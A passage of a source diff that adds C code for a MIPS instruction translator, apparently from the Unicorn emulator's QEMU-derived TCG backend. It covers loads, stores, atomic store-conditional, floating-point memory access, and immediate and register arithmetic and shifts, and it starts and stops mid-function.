tcg_gen_ld_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUMIPSState, lladdr)); \ + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, arg2, t0, l2); \ + tcg_gen_movi_tl(tcg_ctx, t0, rt | ((almask << 3) & 0x20)); \ + tcg_gen_st_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUMIPSState, llreg)); \ + tcg_gen_st_tl(tcg_ctx, arg1, tcg_ctx->cpu_env, offsetof(CPUMIPSState, llnewval)); \ + gen_helper_0e0i(tcg_ctx, raise_exception, EXCP_SC); \ + gen_set_label(tcg_ctx, l2); \ + tcg_gen_movi_tl(tcg_ctx, t0, 0); \ + gen_store_gpr(tcg_ctx, t0, rt); \ + tcg_temp_free(tcg_ctx, t0); \ +} +#else +#define OP_ST_ATOMIC(insn,fname,ldname,almask) \ +static inline void op_st_##insn(TCGContext *tcg_ctx, TCGv arg1, TCGv arg2, int rt, DisasContext *ctx) \ +{ \ + TCGv t0 = tcg_temp_new(tcg_ctx); \ + gen_helper_1e2i(tcg_ctx, insn, t0, arg1, arg2, ctx->mem_idx); \ + gen_store_gpr(tcg_ctx, t0, rt); \ + tcg_temp_free(tcg_ctx, t0); \ +} +#endif +OP_ST_ATOMIC(sc,st32,ld32s,0x3); +#if defined(TARGET_MIPS64) +OP_ST_ATOMIC(scd,st64,ld64,0x7); +#endif +#undef OP_ST_ATOMIC + +static void gen_base_offset_addr (DisasContext *ctx, TCGv addr, + int base, int16_t offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + if (base == 0) { + tcg_gen_movi_tl(tcg_ctx, addr, offset); + } else if (offset == 0) { + gen_load_gpr(ctx, addr, base); + } else { + tcg_gen_movi_tl(tcg_ctx, addr, offset); + gen_op_addr_add(ctx, addr, *cpu_gpr[base], addr); + } +} + +static target_ulong pc_relative_pc (DisasContext *ctx) +{ + target_ulong pc = ctx->pc; + + if (ctx->hflags & MIPS_HFLAG_BMASK) { + int branch_bytes = ctx->hflags & MIPS_HFLAG_BDS16 ? 2 : 4; + + pc -= branch_bytes; + } + + pc &= ~(target_ulong)3; + return pc; +} + +/* Load */ +static void gen_ld(DisasContext *ctx, uint32_t opc, + int rt, int base, int16_t offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "ld"; + TCGv t0, t1, t2; + + if (rt == 0 && ctx->insn_flags & (INSN_LOONGSON2E | INSN_LOONGSON2F)) { + /* Loongson CPU uses a load to zero register for prefetch. + We emulate it as a NOP. On other CPU we must perform the + actual memory access. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + gen_base_offset_addr(ctx, t0, base, offset); + + switch (opc) { +#if defined(TARGET_MIPS64) + case OPC_LWU: + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEUL); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "lwu"; + break; + case OPC_LD: + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEQ); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "ld"; + break; + case OPC_LLD: + case R6_OPC_LLD: + save_cpu_state(ctx, 1); + op_ld_lld(tcg_ctx, t0, t0, ctx); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "lld"; + break; + case OPC_LDL: + t1 = tcg_temp_new(tcg_ctx); + tcg_gen_andi_tl(tcg_ctx, t1, t0, 7); +#ifndef TARGET_WORDS_BIGENDIAN + tcg_gen_xori_tl(tcg_ctx, t1, t1, 7); +#endif + tcg_gen_shli_tl(tcg_ctx, t1, t1, 3); + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~7); + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEQ); + tcg_gen_shl_tl(tcg_ctx, t0, t0, t1); + tcg_gen_xori_tl(tcg_ctx, t1, t1, 63); + t2 = tcg_const_tl(tcg_ctx, 0x7fffffffffffffffull); + tcg_gen_shr_tl(tcg_ctx, t2, t2, t1); + gen_load_gpr(ctx, t1, rt); + tcg_gen_and_tl(tcg_ctx, t1, t1, t2); + tcg_temp_free(tcg_ctx, t2); + tcg_gen_or_tl(tcg_ctx, t0, t0, t1); + tcg_temp_free(tcg_ctx, t1); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "ldl"; + break; + case OPC_LDR: + t1 = tcg_temp_new(tcg_ctx); + tcg_gen_andi_tl(tcg_ctx, t1, t0, 7); +#ifdef TARGET_WORDS_BIGENDIAN + tcg_gen_xori_tl(tcg_ctx, t1, t1, 7); +#endif + tcg_gen_shli_tl(tcg_ctx, t1, t1, 3); + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~7); + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEQ); + tcg_gen_shr_tl(tcg_ctx, t0, t0, t1); + tcg_gen_xori_tl(tcg_ctx, t1, t1, 63); + t2 = tcg_const_tl(tcg_ctx, 0xfffffffffffffffeull); + tcg_gen_shl_tl(tcg_ctx, t2, t2, t1); + gen_load_gpr(ctx, t1, rt); + tcg_gen_and_tl(tcg_ctx, t1, t1, t2); + tcg_temp_free(tcg_ctx, t2); + tcg_gen_or_tl(tcg_ctx, t0, t0, t1); + tcg_temp_free(tcg_ctx, t1); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "ldr"; + break; + case OPC_LDPC: + t1 = tcg_const_tl(tcg_ctx, pc_relative_pc(ctx)); + gen_op_addr_add(ctx, t0, t0, t1); + tcg_temp_free(tcg_ctx, t1); + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEQ); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "ldpc"; + break; +#endif + case OPC_LWPC: + t1 = tcg_const_tl(tcg_ctx, pc_relative_pc(ctx)); + gen_op_addr_add(ctx, t0, t0, t1); + tcg_temp_free(tcg_ctx, t1); + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TESL); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "lwpc"; + break; + case OPC_LW: + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TESL); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "lw"; + break; + case OPC_LH: + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TESW); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "lh"; + break; + case OPC_LHU: + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEUW); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "lhu"; + break; + case OPC_LB: + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_SB); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "lb"; + break; + case OPC_LBU: + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_UB); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "lbu"; + break; + case OPC_LWL: + t1 = tcg_temp_new(tcg_ctx); + tcg_gen_andi_tl(tcg_ctx, t1, t0, 3); +#ifndef TARGET_WORDS_BIGENDIAN + tcg_gen_xori_tl(tcg_ctx, t1, t1, 3); +#endif + tcg_gen_shli_tl(tcg_ctx, t1, t1, 3); + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~3); + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEUL); + tcg_gen_shl_tl(tcg_ctx, t0, t0, t1); + tcg_gen_xori_tl(tcg_ctx, t1, t1, 31); + t2 = tcg_const_tl(tcg_ctx, 0x7fffffffull); + tcg_gen_shr_tl(tcg_ctx, t2, t2, t1); + gen_load_gpr(ctx, t1, rt); + tcg_gen_and_tl(tcg_ctx, t1, t1, t2); + tcg_temp_free(tcg_ctx, t2); + tcg_gen_or_tl(tcg_ctx, t0, t0, t1); + tcg_temp_free(tcg_ctx, t1); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "lwl"; + break; + case OPC_LWR: + t1 = tcg_temp_new(tcg_ctx); + tcg_gen_andi_tl(tcg_ctx, t1, t0, 3); +#ifdef TARGET_WORDS_BIGENDIAN + tcg_gen_xori_tl(tcg_ctx, t1, t1, 3); +#endif + tcg_gen_shli_tl(tcg_ctx, t1, t1, 3); + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~3); + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEUL); + tcg_gen_shr_tl(tcg_ctx, t0, t0, t1); + tcg_gen_xori_tl(tcg_ctx, t1, t1, 31); + t2 = tcg_const_tl(tcg_ctx, 0xfffffffeull); + tcg_gen_shl_tl(tcg_ctx, t2, t2, t1); + gen_load_gpr(ctx, t1, rt); + tcg_gen_and_tl(tcg_ctx, t1, t1, t2); + tcg_temp_free(tcg_ctx, t2); + tcg_gen_or_tl(tcg_ctx, t0, t0, t1); + tcg_temp_free(tcg_ctx, t1); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "lwr"; + break; + case OPC_LL: + case R6_OPC_LL: + save_cpu_state(ctx, 1); + op_ld_ll(tcg_ctx, t0, t0, ctx); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "ll"; + break; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %d(%s)", opn, regnames[rt], offset, regnames[base]); + tcg_temp_free(tcg_ctx, t0); +} + +/* Store */ +static void gen_st (DisasContext *ctx, uint32_t opc, int rt, + int base, int16_t offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "st"; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + gen_base_offset_addr(ctx, t0, base, offset); + gen_load_gpr(ctx, t1, rt); + switch (opc) { +#if defined(TARGET_MIPS64) + case OPC_SD: + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEQ); + opn = "sd"; + break; + case OPC_SDL: + save_cpu_state(ctx, 1); + gen_helper_0e2i(tcg_ctx, sdl, t1, t0, ctx->mem_idx); + opn = "sdl"; + break; + case OPC_SDR: + save_cpu_state(ctx, 1); + gen_helper_0e2i(tcg_ctx, sdr, t1, t0, ctx->mem_idx); + opn = "sdr"; + break; +#endif + case OPC_SW: + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL); + opn = "sw"; + break; + case OPC_SH: + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUW); + opn = "sh"; + break; + case OPC_SB: + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_8); + opn = "sb"; + break; + case OPC_SWL: + save_cpu_state(ctx, 1); + gen_helper_0e2i(tcg_ctx, swl, t1, t0, ctx->mem_idx); + opn = "swl"; + break; + case OPC_SWR: + save_cpu_state(ctx, 1); + gen_helper_0e2i(tcg_ctx, swr, t1, t0, ctx->mem_idx); + opn = "swr"; + break; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %d(%s)", opn, regnames[rt], offset, regnames[base]); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + + +/* Store conditional */ +static void gen_st_cond (DisasContext *ctx, uint32_t opc, int rt, + int base, int16_t offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "st_cond"; + TCGv t0, t1; + +#ifdef CONFIG_USER_ONLY + t0 = tcg_temp_local_new(tcg_ctx); + t1 = tcg_temp_local_new(tcg_ctx); +#else + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); +#endif + gen_base_offset_addr(ctx, t0, base, offset); + gen_load_gpr(ctx, t1, rt); + switch (opc) { +#if defined(TARGET_MIPS64) + case OPC_SCD: + case R6_OPC_SCD: + save_cpu_state(ctx, 1); + op_st_scd(tcg_ctx, t1, t0, rt, ctx); + opn = "scd"; + break; +#endif + case OPC_SC: + case R6_OPC_SC: + save_cpu_state(ctx, 1); + op_st_sc(tcg_ctx, t1, t0, rt, ctx); + opn = "sc"; + break; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %d(%s)", opn, regnames[rt], offset, regnames[base]); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, t0); +} + +/* Load and store */ +static void gen_flt_ldst (DisasContext *ctx, uint32_t opc, int ft, + int base, int16_t offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "flt_ldst"; + TCGv t0 = tcg_temp_new(tcg_ctx); + + gen_base_offset_addr(ctx, t0, base, offset); + /* Don't do NOP if destination is zero: we must perform the actual + memory access. */ + switch (opc) { + case OPC_LWC1: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_qemu_ld_i32(ctx->uc, fp0, t0, ctx->mem_idx, MO_TESL); + gen_store_fpr32(ctx, fp0, ft); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "lwc1"; + break; + case OPC_SWC1: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, ft); + tcg_gen_qemu_st_i32(ctx->uc, fp0, t0, ctx->mem_idx, MO_TEUL); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "swc1"; + break; + case OPC_LDC1: + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_qemu_ld_i64(ctx->uc, fp0, t0, ctx->mem_idx, MO_TEQ); + gen_store_fpr64(ctx, fp0, ft); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "ldc1"; + break; + case OPC_SDC1: + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, ft); + tcg_gen_qemu_st_i64(ctx->uc, fp0, t0, ctx->mem_idx, MO_TEQ); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "sdc1"; + break; + default: + MIPS_INVAL(opn); + generate_exception(ctx, EXCP_RI); + goto out; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %d(%s)", opn, fregnames[ft], offset, regnames[base]); + out: + tcg_temp_free(tcg_ctx, t0); +} + +static void gen_cop1_ldst(DisasContext *ctx, uint32_t op, int rt, + int rs, int16_t imm) +{ + if (ctx->CP0_Config1 & (1 << CP0C1_FP)) { + check_cp1_enabled(ctx); + gen_flt_ldst(ctx, op, rt, rs, imm); + } else { + generate_exception_err(ctx, EXCP_CpU, 1); + } +} + +/* Arithmetic with immediate operand */ +static void gen_arith_imm(DisasContext *ctx, uint32_t opc, + int rt, int rs, int16_t imm) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + target_ulong uimm = (target_long)imm; /* Sign extend to 32/64 bits */ + const char *opn = "imm arith"; + + if (rt == 0 && opc != OPC_ADDI && opc != OPC_DADDI) { + /* If no destination, treat it as a NOP. + For addi, we must generate the overflow exception when needed. */ + MIPS_DEBUG("NOP"); + return; + } + switch (opc) { + case OPC_ADDI: + { + TCGv t0 = tcg_temp_local_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + TCGv t2 = tcg_temp_new(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + + gen_load_gpr(ctx, t1, rs); + tcg_gen_addi_tl(tcg_ctx, t0, t1, uimm); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + + tcg_gen_xori_tl(tcg_ctx, t1, t1, ~uimm); + tcg_gen_xori_tl(tcg_ctx, t2, t0, uimm); + tcg_gen_and_tl(tcg_ctx, t1, t1, t2); + tcg_temp_free(tcg_ctx, t2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); + tcg_temp_free(tcg_ctx, t1); + /* operands of same sign, result different sign */ + generate_exception(ctx, EXCP_OVERFLOW); + gen_set_label(tcg_ctx, l1); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + gen_store_gpr(tcg_ctx, t0, rt); + tcg_temp_free(tcg_ctx, t0); + } + opn = "addi"; + break; + case OPC_ADDIU: + if (rs != 0) { + tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rs], uimm); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rt], uimm); + } + opn = "addiu"; + break; +#if defined(TARGET_MIPS64) + case OPC_DADDI: + { + TCGv t0 = tcg_temp_local_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + TCGv t2 = tcg_temp_new(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + + gen_load_gpr(ctx, t1, rs); + tcg_gen_addi_tl(tcg_ctx, t0, t1, uimm); + + tcg_gen_xori_tl(tcg_ctx, t1, t1, ~uimm); + tcg_gen_xori_tl(tcg_ctx, t2, t0, uimm); + tcg_gen_and_tl(tcg_ctx, t1, t1, t2); + tcg_temp_free(tcg_ctx, t2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); + tcg_temp_free(tcg_ctx, t1); + /* operands of same sign, result different sign */ + generate_exception(ctx, EXCP_OVERFLOW); + gen_set_label(tcg_ctx, l1); + gen_store_gpr(tcg_ctx, t0, rt); + tcg_temp_free(tcg_ctx, t0); + } + opn = "daddi"; + break; + case OPC_DADDIU: + if (rs != 0) { + tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rs], uimm); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rt], uimm); + } + opn = "daddiu"; + break; +#endif + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, " TARGET_FMT_lx, opn, regnames[rt], regnames[rs], uimm); +} + +/* Logic with immediate operand */ +static void gen_logic_imm(DisasContext *ctx, uint32_t opc, + int rt, int rs, int16_t imm) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + target_ulong uimm; + + if (rt == 0) { + /* If no destination, treat it as a NOP. */ + MIPS_DEBUG("NOP"); + return; + } + uimm = (uint16_t)imm; + switch (opc) { + case OPC_ANDI: + if (likely(rs != 0)) + tcg_gen_andi_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rs], uimm); + else + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rt], 0); + MIPS_DEBUG("andi %s, %s, " TARGET_FMT_lx, regnames[rt], + regnames[rs], uimm); + break; + case OPC_ORI: + if (rs != 0) + tcg_gen_ori_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rs], uimm); + else + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rt], uimm); + MIPS_DEBUG("ori %s, %s, " TARGET_FMT_lx, regnames[rt], + regnames[rs], uimm); + break; + case OPC_XORI: + if (likely(rs != 0)) + tcg_gen_xori_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rs], uimm); + else + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rt], uimm); + MIPS_DEBUG("xori %s, %s, " TARGET_FMT_lx, regnames[rt], + regnames[rs], uimm); + break; + case OPC_LUI: + if (rs != 0 && (ctx->insn_flags & ISA_MIPS32R6)) { + /* OPC_AUI */ + tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rs], uimm << 16); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt]); + MIPS_DEBUG("aui %s, %s, %04x", regnames[rt], regnames[rs], imm); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rt], uimm << 16); + MIPS_DEBUG("lui %s, " TARGET_FMT_lx, regnames[rt], uimm); + } + break; + + default: + MIPS_DEBUG("Unknown logical immediate opcode %08x", opc); + break; + } +} + +/* Set on less than with immediate operand */ +static void gen_slt_imm(DisasContext *ctx, uint32_t opc, + int rt, int rs, int16_t imm) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + target_ulong uimm = (target_long)imm; /* Sign extend to 32/64 bits */ + const char *opn = "imm arith"; + TCGv t0; + + if (rt == 0) { + /* If no destination, treat it as a NOP. */ + MIPS_DEBUG("NOP"); + return; + } + t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + switch (opc) { + case OPC_SLTI: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, *cpu_gpr[rt], t0, uimm); + opn = "slti"; + break; + case OPC_SLTIU: + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LTU, *cpu_gpr[rt], t0, uimm); + opn = "sltiu"; + break; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, " TARGET_FMT_lx, opn, regnames[rt], regnames[rs], uimm); + tcg_temp_free(tcg_ctx, t0); +} + +/* Shifts with immediate operand */ +static void gen_shift_imm(DisasContext *ctx, uint32_t opc, + int rt, int rs, int16_t imm) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + target_ulong uimm = ((uint16_t)imm) & 0x1f; + const char *opn = "imm shift"; + TCGv t0; + + if (rt == 0) { + /* If no destination, treat it as a NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + switch (opc) { + case OPC_SLL: + tcg_gen_shli_tl(tcg_ctx, t0, t0, uimm); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], t0); + opn = "sll"; + break; + case OPC_SRA: + tcg_gen_sari_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm); + opn = "sra"; + break; + case OPC_SRL: + if (uimm != 0) { + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_shri_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm); + } else { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], t0); + } + opn = "srl"; + break; + case OPC_ROTR: + if (uimm != 0) { + TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_trunc_tl_i32(tcg_ctx, t1, t0); + tcg_gen_rotri_i32(tcg_ctx, t1, t1, uimm); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_gpr[rt], t1); + tcg_temp_free_i32(tcg_ctx, t1); + } else { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], t0); + } + opn = "rotr"; + break; +#if defined(TARGET_MIPS64) + case OPC_DSLL: + tcg_gen_shli_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm); + opn = "dsll"; + break; + case OPC_DSRA: + tcg_gen_sari_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm); + opn = "dsra"; + break; + case OPC_DSRL: + tcg_gen_shri_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm); + opn = "dsrl"; + break; + case OPC_DROTR: + if (uimm != 0) { + tcg_gen_rotri_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm); + } else { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rt], t0); + } + opn = "drotr"; + break; + case OPC_DSLL32: + tcg_gen_shli_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm + 32); + opn = "dsll32"; + break; + case OPC_DSRA32: + tcg_gen_sari_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm + 32); + opn = "dsra32"; + break; + case OPC_DSRL32: + tcg_gen_shri_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm + 32); + opn = "dsrl32"; + break; + case OPC_DROTR32: + tcg_gen_rotri_tl(tcg_ctx, *cpu_gpr[rt], t0, uimm + 32); + opn = "drotr32"; + break; +#endif + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, " TARGET_FMT_lx, opn, regnames[rt], regnames[rs], uimm); + tcg_temp_free(tcg_ctx, t0); +} + +/* Arithmetic */ +static void gen_arith(DisasContext *ctx, uint32_t opc, + int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "arith"; + + if (rd == 0 && opc != OPC_ADD && opc != OPC_SUB + && opc != OPC_DADD && opc != OPC_DSUB) { + /* If no destination, treat it as a NOP. + For add & sub, we must generate the overflow exception when needed. */ + MIPS_DEBUG("NOP"); + return; + } + + switch (opc) { + case OPC_ADD: + { + TCGv t0 = tcg_temp_local_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + TCGv t2 = tcg_temp_new(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + + gen_load_gpr(ctx, t1, rs); + gen_load_gpr(ctx, t2, rt); + tcg_gen_add_tl(tcg_ctx, t0, t1, t2); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + tcg_gen_xor_tl(tcg_ctx, t1, t1, t2); + tcg_gen_xor_tl(tcg_ctx, t2, t0, t2); + tcg_gen_andc_tl(tcg_ctx, t1, t2, t1); + tcg_temp_free(tcg_ctx, t2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); + tcg_temp_free(tcg_ctx, t1); + /* operands of same sign, result different sign */ + generate_exception(ctx, EXCP_OVERFLOW); + gen_set_label(tcg_ctx, l1); + gen_store_gpr(tcg_ctx, t0, rd); + tcg_temp_free(tcg_ctx, t0); + } + opn = "add"; + break; + case OPC_ADDU: + if (rs != 0 && rt != 0) { + tcg_gen_add_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + } else if (rs == 0 && rt != 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rt]); + } else if (rs != 0 && rt == 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "addu"; + break; + case OPC_SUB: + { + TCGv t0 = tcg_temp_local_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + TCGv t2 = tcg_temp_new(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + + gen_load_gpr(ctx, t1, rs); + gen_load_gpr(ctx, t2, rt); + tcg_gen_sub_tl(tcg_ctx, t0, t1, t2); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + tcg_gen_xor_tl(tcg_ctx, t2, t1, t2); + tcg_gen_xor_tl(tcg_ctx, t1, t0, t1); + tcg_gen_and_tl(tcg_ctx, t1, t1, t2); + tcg_temp_free(tcg_ctx, t2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); + tcg_temp_free(tcg_ctx, t1); + /* operands of different sign, first operand and result different sign */ + generate_exception(ctx, EXCP_OVERFLOW); + gen_set_label(tcg_ctx, l1); + gen_store_gpr(tcg_ctx, t0, rd); + tcg_temp_free(tcg_ctx, t0); + } + opn = "sub"; + break; + case OPC_SUBU: + if (rs != 0 && rt != 0) { + tcg_gen_sub_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + } else if (rs == 0 && rt != 0) { + tcg_gen_neg_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rt]); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + } else if (rs != 0 && rt == 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } + opn = "subu"; + break; +#if defined(TARGET_MIPS64) + case OPC_DADD: + { + TCGv t0 = tcg_temp_local_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + TCGv t2 = tcg_temp_new(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + + gen_load_gpr(ctx, t1, rs); + gen_load_gpr(ctx, t2, rt); + tcg_gen_add_tl(tcg_ctx, t0, t1, t2); + tcg_gen_xor_tl(tcg_ctx, t1, t1, t2); + tcg_gen_xor_tl(tcg_ctx, t2, t0, t2); + tcg_gen_andc_tl(tcg_ctx, t1, t2, t1); + tcg_temp_free(tcg_ctx, t2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); + tcg_temp_free(tcg_ctx, t1); + /* operands of same sign, result different sign */ + generate_exception(ctx, EXCP_OVERFLOW); + gen_set_label(tcg_ctx, l1); + gen_store_gpr(tcg_ctx, t0, rd); + tcg_temp_free(tcg_ctx, t0); + } + opn = "dadd"; + break; + case OPC_DADDU: + if (rs != 0 && rt != 0) { + tcg_gen_add_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs], *cpu_gpr[rt]); + } else if (rs == 0 && rt != 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rt]); + } else if (rs != 0 && rt == 0) { + 